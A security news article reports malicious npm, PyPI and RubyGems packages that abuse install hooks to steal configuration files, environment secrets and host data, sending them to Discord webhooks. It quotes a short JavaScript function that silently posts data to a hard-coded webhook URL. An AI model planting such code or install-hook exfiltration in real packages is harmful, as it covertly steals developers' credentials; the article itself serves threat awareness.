Cybercriminals have discovered a novel way to co-opt Discord webhooks as surrogate command-and-control (C2) channels across popular language ecosystems.
Unlike traditional C2 servers, webhooks offer free, low-profile exfiltration that blends seamlessly into legitimate HTTPS traffic.
Over the past month, malicious packages in npm, PyPI, and RubyGems have quietly siphoned sensitive files and telemetry from developer machines and continuous integration environments.
Initial sightings involved a seemingly innocuous npm module named mysql-dumpdiscord. Upon installation or execution, it probes for configuration and environment files—such as config[.]json, [.]env, and ayarlar[.]js—reads their contents, and then issues an HTTP POST to a hard-coded Discord webhook URL.
The attacker-controlled webhook, embedded as a string constant, receives each file’s contents, with longer files truncated to 1,900 characters to fit Discord’s messaging limits.
Socket.dev analysts identified this technique only after network monitoring flagged an unusual spike in POST requests to discord[.]com/ api/ webhooks/....
Further investigation revealed a second npm proof-of-concept leveraging the official discord.js library:-
const { WebhookClient } = require ('discord.js');
module.exports = async function send (messages) {
try {
const client = new WebhookClient ({ url: 'https://discord.com/api/webhooks/1323713674971713676/…' });
await client.send (messages.join(' '));
} catch (e) {
// Silent failure
}
};This minimalist approach transforms any string passed into the function into a C2 message, bypassing host-based detection that looks for unusual domains or signatures.
Across ecosystems, threat actors adopt similar tactics. In Python’s PyPI registry, a package dubbed malinssx overrides the install command in setuptools.
During pip install, it serializes a notification message in Vietnamese—“Some just installed the maladicus package via pip!”—and dispatches it to its Discord webhook.
Any network errors are caught and ignored, and the legitimate install process continues unobstructed.
In RubyGems, an altered version of sqlcommenterrails collects host metadata—such as / etc / passwd contents, DNS servers, current user, and public IP—and formats it into a multi-line JSON payload.
This is then POSTed to a webhook over HTTPS. Error handling is silent, ensuring no interruption in the gem installation.
Infection Mechanism
These packages exploit install-time hooks to achieve persistence and stealth. By overriding installer commands (install[.]run in Python, gemspec hooks in Ruby), malicious code executes before the host’s security controls alert on runtime behaviors.
This early-stage execution means secrets are exfiltrated long before code analysis or endpoint protection kicks in.
Moreover, using Discord’s infrastructure avoids raising suspicions from static allow-lists that permit traffic to discord[.]com for business collaboration, turning a trusted domain into a covert data pipeline.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
